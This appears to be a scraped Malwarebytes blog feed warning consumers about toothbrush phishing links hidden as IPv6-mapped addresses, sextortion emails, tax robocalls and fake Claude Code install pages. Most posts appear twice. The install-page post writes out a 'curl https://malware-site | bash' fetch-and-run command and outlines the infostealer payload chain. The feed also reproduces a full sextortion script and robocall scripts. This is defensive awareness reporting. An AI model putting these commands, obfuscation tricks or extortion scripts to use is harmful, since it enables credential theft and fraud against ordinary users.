Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Phishers hide scam links with IPv6 trick in “free toothbrush” emails

11 March 2026 at 19:17

A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link.

two email examples
Two examples of phishing emails

Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this:

https://{string}.blob.core.windows.net/{same string}/1.html

to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example:

http://[::ffff:5111:8e14]/

In URLs, putting an IP in square brackets means it’s an IPv6 literal. So [::ffff:5111:8e14] is treated as an IPv6 address.

::ffff:x:y is a standard form called an IPv4-mapped IPv6 address, used to represent an IPv4 address inside IPv6 notation. The last 32 bits (the x:y part) encode the IPv4 address.

So we need to convert 5111:8e14 to an IPv4 address. 5111 and 8e14 are hexadecimal numbers. In theory that means:

  1. 0x5111 in decimal = 20753
  2. 0x8e14 in decimal = 36372

But for IPv4-mapped addresses we really treat that last 32 bits as four bytes. If we unpack 0x51 0x11 0x8e 0x14:

  1. 0x51 = 81
  2. 0x11 = 17
  3. 0x8e = 142
  4. 0x14 = 20

So, the IPv4 address this URL leads to is 81.17.142.20

The emails are variations on a bogus reward from scammers pretending to be United Healthcare that uses a premium Oral‑B iO toothbrush as bait. Victims are sent to a fast‑rotating landing page where the likely endgame is the collection of personally identifiable information (PII) and card data under the guise of confirming eligibility or paying a small shipping fee.

How to stay safe

What to do if you entered your details

If you submitted your card details:

  • Contact your bank or card issuer immediately and cancel the card
  • Dispute any unauthorized charges
  • Don’t wait for fraud to appear. Stolen card data is often used quickly
  • Change passwords for accounts linked to the email address you provided
  • Run a full scan with a reputable security product

Other ways to stay safe:

Indicators of Compromise (IOCs)

81.17.142.40

15.204.145.84

redirectingherenow[.]com

redirectofferid[.]pro


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Phishers hide scam links with IPv6 trick in “free toothbrush” emails

11 March 2026 at 19:17

A recurring lure in phishing emails impersonating United Healthcare is the promise of a free Oral-B toothbrush. But the interesting part isn’t the toothbrush. It’s the link.

two email examples
Two examples of phishing emails

Recently we found that these phishers have moved from using Microsoft Azure Blob Storage (links looking like this:

https://{string}.blob.core.windows.net/{same string}/1.html

to links obfuscated by using an IPv6-mapped IPv4 address to hide the IP in a way that looks confusing but is still perfectly valid and routable. For example:

http://[::ffff:5111:8e14]/

In URLs, putting an IP in square brackets means it’s an IPv6 literal. So [::ffff:5111:8e14] is treated as an IPv6 address.

::ffff:x:y is a standard form called an IPv4-mapped IPv6 address, used to represent an IPv4 address inside IPv6 notation. The last 32 bits (the x:y part) encode the IPv4 address.

So we need to convert 5111:8e14 to an IPv4 address. 5111 and 8e14 are hexadecimal numbers. In theory that means:

  1. 0x5111 in decimal = 20753
  2. 0x8e14 in decimal = 36372

But for IPv4-mapped addresses we really treat that last 32 bits as four bytes. If we unpack 0x51 0x11 0x8e 0x14:

  1. 0x51 = 81
  2. 0x11 = 17
  3. 0x8e = 142
  4. 0x14 = 20

So, the IPv4 address this URL leads to is 81.17.142.20

The emails are variations on a bogus reward from scammers pretending to be United Healthcare that uses a premium Oral‑B iO toothbrush as bait. Victims are sent to a fast‑rotating landing page where the likely endgame is the collection of personally identifiable information (PII) and card data under the guise of confirming eligibility or paying a small shipping fee.

How to stay safe

What to do if you entered your details

If you submitted your card details:

  • Contact your bank or card issuer immediately and cancel the card
  • Dispute any unauthorized charges
  • Don’t wait for fraud to appear. Stolen card data is often used quickly
  • Change passwords for accounts linked to the email address you provided
  • Run a full scan with a reputable security product

Other ways to stay safe:

Indicators of Compromise (IOCs)

81.17.142.40

15.204.145.84

redirectingherenow[.]com

redirectofferid[.]pro


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Sextortion “I recorded you” emails reuse passwords found in disposable inboxes

11 March 2026 at 15:56

Our malware removal support team recently flagged a new wave of sextortion emails, with the subject line: “You pervert, I recorded you!”

If the message sounds familiar, that’s because it’s a variation of the long-running “Hello pervert” scam.

The email claims the target’s device has been infected by a “drive-by exploit,” which supposedly gave the extortionist full access to the device. To add credibility, the scammer includes a password that actually belongs to the target.

Here’s one of the emails:

screenshot of sextortion email

Your device was compromised by my private malware. An outdated browser makes you vulnerable; simply visiting a malicious website containing my iframe can result in automatic infection.
For further information search for ‘Drive-by exploit’ on Google.
My malware has granted me full access to your accounts, complete control over your device, and the ability to monitor you via your camera.
If you believe this is a joke, no, I know your password: {an actual password}
I have collected all your private data and RECORDED FOOTAGE OF YOU MASTRUBATING THROUGH YOUR CAMERA!
To erase all traces, I have removed my malware.
If you doubt my seriousness, it takes only a few clicks to share your private video with friends, family, contacts, social networks, the darknet, or to publish your files.
You are the only one who can stop me, and I am here to help.
The only way to prevent further damage is to pay exactly $800 in Bitcoin (BTC).
This is a reasonable offer compared to the potential consequences of disclosure.
You can purchase Bitcoin (BTC) from reputable exchanges here:
{list of crypto-currency exchanges}
Once purchased, you can send the Bitcoin directly to my wallet address or use a wallet application such as Atomic Wallet or Exodus Wallet to manage your transactions.
My Bitcoin (BTC) wallet address is: {bitcoin wallet which has received 1 payment at the time of writing}
Copy and paste this address carefully, as it is case-sensitive.
You have 4 days to complete the payment.
Since I have access to this email account, I will be aware if this message has been read.
Upon receipt of the payment, I will remove all traces of my malware, and you can resume your normal life peacefully.
I keep my promises!

The message is a bit contradictory. Early on, the sender claims they have already removed the malware to “erase all traces,” but later promises to remove it after receiving payment.

Where the password comes from

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people that use the FakeMailGenerator service.

FakeMailGenerator is a free disposable email service that gives users a temporary, receive‑only inbox they can use instead of their real address, mainly to get around email confirmations or avoid spam.

As mentioned, the addresses are receive‑only, meaning they cannot legitimately send mail and the mailbox is not tied to a specific person. On top of that, there is no login. Anyone who knows the address (or guesses the inbox URL) can see the same inbox.

My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.

So users of FakeMailGenerator and similar services should consider this a warning. Your inbox may be publicly accessible, show up in search results, and you may receive a lot more than what you signed up for. Definitely don’t use services like this for anything sensitive.

How to stay safe

Knowing these scams exist is the first step to avoiding them. Sextortion emails rely on panic and embarrassment to push people into paying quickly. Here are a few simple steps to protect yourself:

  • Don’t rush. Scammers rely on fear and urgency. Take a moment to think before reacting.
  • Don’t reply to the email. Responding tells the attacker that someone is reading messages at that address, which may lead to more scams.
  • Change your password if it appears in the email. If you still use that password anywhere, update it.
  • Use a password manager. If you’re having trouble generating or storing a strong password, have a look at a password manager.
  • Don’t open unsolicited attachments. Especially when the sender address is suspicious or even your own.
  • Don’t use disposable inboxes for important accounts. The mail in that inbox might be available for anyone to find.
  • For peace of mind, turn your webcam off or buy a webcam cover so you can cover it when you’re not using the webcam.

Pro tip: Malwarebytes Scam Guard immediately recognized this for what it is: a sextortion scam.


What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

Sextortion “I recorded you” emails reuse passwords found in disposable inboxes

11 March 2026 at 15:56

Our malware removal support team recently flagged a new wave of sextortion emails, with the subject line: “You pervert, I recorded you!”

If the message sounds familiar, that’s because it’s a variation of the long-running “Hello pervert” scam.

The email claims the target’s device has been infected by a “drive-by exploit,” which supposedly gave the extortionist full access to the device. To add credibility, the scammer includes a password that actually belongs to the target.

Here’s one of the emails:

screenshot of sextortion email

Your device was compromised by my private malware. An outdated browser makes you vulnerable; simply visiting a malicious website containing my iframe can result in automatic infection.
For further information search for ‘Drive-by exploit’ on Google.
My malware has granted me full access to your accounts, complete control over your device, and the ability to monitor you via your camera.
If you believe this is a joke, no, I know your password: {an actual password}
I have collected all your private data and RECORDED FOOTAGE OF YOU MASTRUBATING THROUGH YOUR CAMERA!
To erase all traces, I have removed my malware.
If you doubt my seriousness, it takes only a few clicks to share your private video with friends, family, contacts, social networks, the darknet, or to publish your files.
You are the only one who can stop me, and I am here to help.
The only way to prevent further damage is to pay exactly $800 in Bitcoin (BTC).
This is a reasonable offer compared to the potential consequences of disclosure.
You can purchase Bitcoin (BTC) from reputable exchanges here:
{list of crypto-currency exchanges}
Once purchased, you can send the Bitcoin directly to my wallet address or use a wallet application such as Atomic Wallet or Exodus Wallet to manage your transactions.
My Bitcoin (BTC) wallet address is: {bitcoin wallet which has received 1 payment at the time of writing}
Copy and paste this address carefully, as it is case-sensitive.
You have 4 days to complete the payment.
Since I have access to this email account, I will be aware if this message has been read.
Upon receipt of the payment, I will remove all traces of my malware, and you can resume your normal life peacefully.
I keep my promises!

The message is a bit contradictory. Early on, the sender claims they have already removed the malware to “erase all traces,” but later promises to remove it after receiving payment.

Where the password comes from

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people that use the FakeMailGenerator service.

FakeMailGenerator is a free disposable email service that gives users a temporary, receive‑only inbox they can use instead of their real address, mainly to get around email confirmations or avoid spam.

As mentioned, the addresses are receive‑only, meaning they cannot legitimately send mail and the mailbox is not tied to a specific person. On top of that, there is no login. Anyone who knows the address (or guesses the inbox URL) can see the same inbox.

My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.

So users of FakeMailGenerator and similar services should consider this a warning. Your inbox may be publicly accessible, show up in search results, and you may receive a lot more than what you signed up for. Definitely don’t use services like this for anything sensitive.

How to stay safe

Knowing these scams exist is the first step to avoiding them. Sextortion emails rely on panic and embarrassment to push people into paying quickly. Here are a few simple steps to protect yourself:

  • Don’t rush. Scammers rely on fear and urgency. Take a moment to think before reacting.
  • Don’t reply to the email. Responding tells the attacker that someone is reading messages at that address, which may lead to more scams.
  • Change your password if it appears in the email. If you still use that password anywhere, update it.
  • Use a password manager. If you’re having trouble generating or storing a strong password, have a look at a password manager.
  • Don’t open unsolicited attachments. Especially when the sender address is suspicious or even your own.
  • Don’t use disposable inboxes for important accounts. The mail in that inbox might be available for anyone to find.
  • For peace of mind, turn your webcam off or buy a webcam cover so you can cover it when you’re not using the webcam.

Pro tip: Malwarebytes Scam Guard immediately recognized this for what it is: a sextortion scam.


What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

Watch out for tax-season robocalls pushing fake “relief programs”

11 March 2026 at 14:30

While Americans are sorting through paperwork to get their taxes filed in time, scammers are working overtime to grab a piece of the action.

As tax season ramps up, so does scam activity. Our telemetry shows a spike in robocalls impersonating tax resolution firms, tax relief agencies, and vaguely named “assistance centers.” These calls are designed to create urgency, fear, and confusion in the hope of pushing recipients to call back before they have time to think critically.

These robocalls typically try to collect personal information, pressure victims into paying fake tax debts, or funnel them into questionable tax-relief services.

Below are transcripts of two recent voicemail examples submitted by anonymized Scam Guard users that illustrate how these scams operate.

The scripts: different names, similar playbook

Voicemail #1

“Hi, this is <REDACTED_NAME> calling on March 3rd from the eligibility support and review division at the tax resolution assistance center.  I’m contacting you because your account remains under active confirmation review.  There is still an opportunity to verify your standing while this evaluation period remains open.  To make this simple, we provide a direct proprietary verification line with no weight, allowing immediate access to clear and accurate information.  This verification step is brief and focused strictly on determining current eligibility and available options.  Please call back at 888-919-9743.  Again, 888-919-9743.  If this message reached you in error, please call back and press 3 to be removed”

Characteristics:

  • Claims to be from an “eligibility support and review division at the tax resolution assistance center.”
  • Says your “account remains under active confirmation review.”
  • Offers a “direct proprietary verification line.”
  • Urges quick action while the “evaluation period remains open.”
  • Provides a callback number and an opt-out option.

Voicemail #2

“Hi, this is <REDACTED_NAME> with professional tax associates. Today is Tuesday March 3rd. I’m calling to follow up on back taxes and missed filings. This may be our only attempt to reach you, and due to new resolution programs that are available for a limited time, we highly recommend you give us a call today. This will be your best opportunity to get a fresh start before it becomes a bigger and permanent issue. Please call us back today at 8338204216 again 8338204216. If you’ve already resolved this issue. You may disregard this message or call back using the number on your caller ID to opt out. Thank you. If you were reached in error or wish to stop future outreach, please press 8 now and you will be removed from future outreach. Thank you and we look forward to assisting you. “

Characteristics:

  • Claims to be with “professional tax associates.”
  • References “back taxes and missed filings.”
  • Warns this “may be our only attempt to reach you.”
  • Mentions “new resolution programs available for a limited time.”
  • Provides a callback number and opt-out instructions.

What these robocalls have in common

While the wording differs slightly, the structure and psychological tactics are nearly identical.

Both messages use generic but authoritative language:

  • “Eligibility support and review division”
  • “Tax resolution assistance center”
  • “Professional tax associates”

These names sound legitimate but don’t identify a specific, verifiable company. Scammers often rely on institutional-sounding phrases to create credibility without providing any real details.

Both messages also reference vague “account” problems, but neither voicemail mentions:

  • Your name
  • A specific tax year
  • A case number
  • A known agency like the IRS

Instead, they reference:

  • “Active confirmation review”
  • “Back taxes and missed filings”
  • “Eligibility and available options”

This vagueness is intentional. It allows the same robocall script to target thousands of people, regardless of their actual tax situation.

What you will always see with scams is urgency. Both calls attempt to rush the recipient into action:

  • “There is still an opportunity… while this evaluation period remains open.”
  • “This may be our only attempt to reach you.”
  • “Limited time resolution programs.”
  • “Call today.”

Creating urgency reduces the likelihood that someone will pause, research the number, or consult a trusted source.

The second voicemail includes the promise of a “fresh start before it becomes a bigger and permanent issue.” This is a common emotional hook, blending fear (a permanent problem) with hope (a fresh start), which can encourage impulsive callbacks.

Both messages push recipients to call a direct number rather than referencing an official website or established contact method. Legitimate tax agencies, including the IRS, do not initiate contact through unsolicited robocalls asking you to call back immediately.

Both scripts include instructions like:

  • “Press 3 to be removed.”
  • “Press 8 now and you will be removed.”
  • “Call back using the number on your caller ID to opt out.”

These opt-out options create an illusion of compliance and legitimacy. In reality, pressing numbers or calling back can confirm that your phone number is active, which may lead to more scam calls.

How to stay safe

Knowing how to identify scam calls is an important step. So, here are some key red flags to watch for:

  • No personalization
  • Vague agency names
  • Pressure to act immediately
  • Threat of missed opportunity
  • Promises of relief without verification
  • Instructions to call back a random 800/833/888 number
  • Robotic or heavily scripted tone

If a message checks at least one of these boxes, it is very likely not legitimate.

  • Before calling a number, verify it by visiting the official site directly.
  • Beware of unsolicited phone calls or emails, especially those that ask you to act immediately. Government agencies will not call out of the blue to demand sensitive personal or financial information.
  • Never provide sensitive personal information such as your bank account, charge card, or Social Security number over unverified channels. Instead use a secure method such as your online account or another application on IRS.gov.
  • Report scams to the IRS to help others.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

Watch out for tax-season robocalls pushing fake “relief programs”

11 March 2026 at 14:30

While Americans are sorting through paperwork to get their taxes filed in time, scammers are working overtime to grab a piece of the action.

As tax season ramps up, so does scam activity. Our telemetry shows a spike in robocalls impersonating tax resolution firms, tax relief agencies, and vaguely named “assistance centers.” These calls are designed to create urgency, fear, and confusion in the hope of pushing recipients to call back before they have time to think critically.

These robocalls typically try to collect personal information, pressure victims into paying fake tax debts, or funnel them into questionable tax-relief services.

Below are transcripts of two recent voicemail examples submitted by anonymized Scam Guard users that illustrate how these scams operate.

The scripts: different names, similar playbook

Voicemail #1

“Hi, this is <REDACTED_NAME> calling on March 3rd from the eligibility support and review division at the tax resolution assistance center.  I’m contacting you because your account remains under active confirmation review.  There is still an opportunity to verify your standing while this evaluation period remains open.  To make this simple, we provide a direct proprietary verification line with no weight, allowing immediate access to clear and accurate information.  This verification step is brief and focused strictly on determining current eligibility and available options.  Please call back at 888-919-9743.  Again, 888-919-9743.  If this message reached you in error, please call back and press 3 to be removed”

Characteristics:

  • Claims to be from an “eligibility support and review division at the tax resolution assistance center.”
  • Says your “account remains under active confirmation review.”
  • Offers a “direct proprietary verification line.”
  • Urges quick action while the “evaluation period remains open.”
  • Provides a callback number and an opt-out option.

Voicemail #2

“Hi, this is <REDACTED_NAME> with professional tax associates. Today is Tuesday March 3rd. I’m calling to follow up on back taxes and missed filings. This may be our only attempt to reach you, and due to new resolution programs that are available for a limited time, we highly recommend you give us a call today. This will be your best opportunity to get a fresh start before it becomes a bigger and permanent issue. Please call us back today at 8338204216 again 8338204216. If you’ve already resolved this issue. You may disregard this message or call back using the number on your caller ID to opt out. Thank you. If you were reached in error or wish to stop future outreach, please press 8 now and you will be removed from future outreach. Thank you and we look forward to assisting you. “

Characteristics:

  • Claims to be with “professional tax associates.”
  • References “back taxes and missed filings.”
  • Warns this “may be our only attempt to reach you.”
  • Mentions “new resolution programs available for a limited time.”
  • Provides a callback number and opt-out instructions.

What these robocalls have in common

While the wording differs slightly, the structure and psychological tactics are nearly identical.

Both messages use generic but authoritative language:

  • “Eligibility support and review division”
  • “Tax resolution assistance center”
  • “Professional tax associates”

These names sound legitimate but don’t identify a specific, verifiable company. Scammers often rely on institutional-sounding phrases to create credibility without providing any real details.

Both messages also reference vague “account” problems, but neither voicemail mentions:

  • Your name
  • A specific tax year
  • A case number
  • A known agency like the IRS

Instead, they reference:

  • “Active confirmation review”
  • “Back taxes and missed filings”
  • “Eligibility and available options”

This vagueness is intentional. It allows the same robocall script to target thousands of people, regardless of their actual tax situation.

What you will always see with scams is urgency. Both calls attempt to rush the recipient into action:

  • “There is still an opportunity… while this evaluation period remains open.”
  • “This may be our only attempt to reach you.”
  • “Limited time resolution programs.”
  • “Call today.”

Creating urgency reduces the likelihood that someone will pause, research the number, or consult a trusted source.

The second voicemail includes the promise of a “fresh start before it becomes a bigger and permanent issue.” This is a common emotional hook, blending fear (a permanent problem) with hope (a fresh start), which can encourage impulsive callbacks.

Both messages push recipients to call a direct number rather than referencing an official website or established contact method. Legitimate tax agencies, including the IRS, do not initiate contact through unsolicited robocalls asking you to call back immediately.

Both scripts include instructions like:

  • “Press 3 to be removed.”
  • “Press 8 now and you will be removed.”
  • “Call back using the number on your caller ID to opt out.”

These opt-out options create an illusion of compliance and legitimacy. In reality, pressing numbers or calling back can confirm that your phone number is active, which may lead to more scam calls.

How to stay safe

Knowing how to identify scam calls is an important step. So, here are some key red flags to watch for:

  • No personalization
  • Vague agency names
  • Pressure to act immediately
  • Threat of missed opportunity
  • Promises of relief without verification
  • Instructions to call back a random 800/833/888 number
  • Robotic or heavily scripted tone

If a message checks at least one of these boxes, it is very likely not legitimate.

  • Before calling a number, verify it by visiting the official site directly.
  • Beware of unsolicited phone calls or emails, especially those that ask you to act immediately. Government agencies will not call out of the blue to demand sensitive personal or financial information.
  • Never provide sensitive personal information such as your bank account, charge card, or Social Security number over unverified channels. Instead use a secure method such as your online account or another application on IRS.gov.
  • Report scams to the IRS to help others.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

Fake Claude Code install pages hit Windows and Mac users with infostealers

9 March 2026 at 14:07

Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments.

Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator.

Researchers found that attackers abuse this workflow by keeping everything identical, only changing where that one‑liner actually connects to. For many non‑specialist users who just started using AI and developer tools, this method feels normal, so their guard is down.

But this basically boils down to “I trust this domain” and that’s not a good idea unless you know for sure that it can be trusted.

It usually plays out like this. Someone searches “Claude Code install” or “Claude Code CLI,” sees a sponsored result at the top with a plausible URL, and clicks without thinking too hard about it.

But that ad leads to a cloned documentation or download page: same logo, same sidebar, same text, and a familiar “copy” button next to the install command. In many cases, any other link you click on that fake page quietly redirects you to the real vendor site, so nothing else looks suspicious.

Similar to ClickFix attacks, this method is called InstallFix. The user runs the code that infects their own machine, under false pretenses, and the payload usually is an infostealer.

The main payload in these Claude Code-themed InstallFix cases is an infostealer called Amatera. It focuses on browser data like saved passwords, cookies, session tokens, autofill data, and general system information that helps attackers profile the device. With that, they can hijack web sessions and log into cloud dashboards and internal administrator panels without ever needing your actual password. Some reports also mention an interest in crypto wallets and other high‑value accounts.

Windows and Mac

The Claude Code-based campaign the researchers found was equipped to target both Windows and Mac users.

On macOS, the malicious one‑liner usually pulls a second‑stage script from an attacker‑controlled domain, often obfuscated with base64 to look noisy but harmless at first glance. That script then downloads and runs a binary from yet another domain, stripping attributes and making it executable before launching it. 

On Windows, the command has been seen spawning cmd.exe, which then calls mshta.exe with a remote URL. This allows the malware logic to run as a trusted Microsoft binary rather than an obvious random executable. In both cases, nothing spectacular appears on screen: you think you just installed a tool, while the real payload silently starts doing its work in the background.

How to stay safe

With ClickFix and InstallFix running rampant—and they don’t look like they’re going away anytime soon—it’s important to be aware, careful, and protected.

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Analyze what the command will do, before you run it.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

❌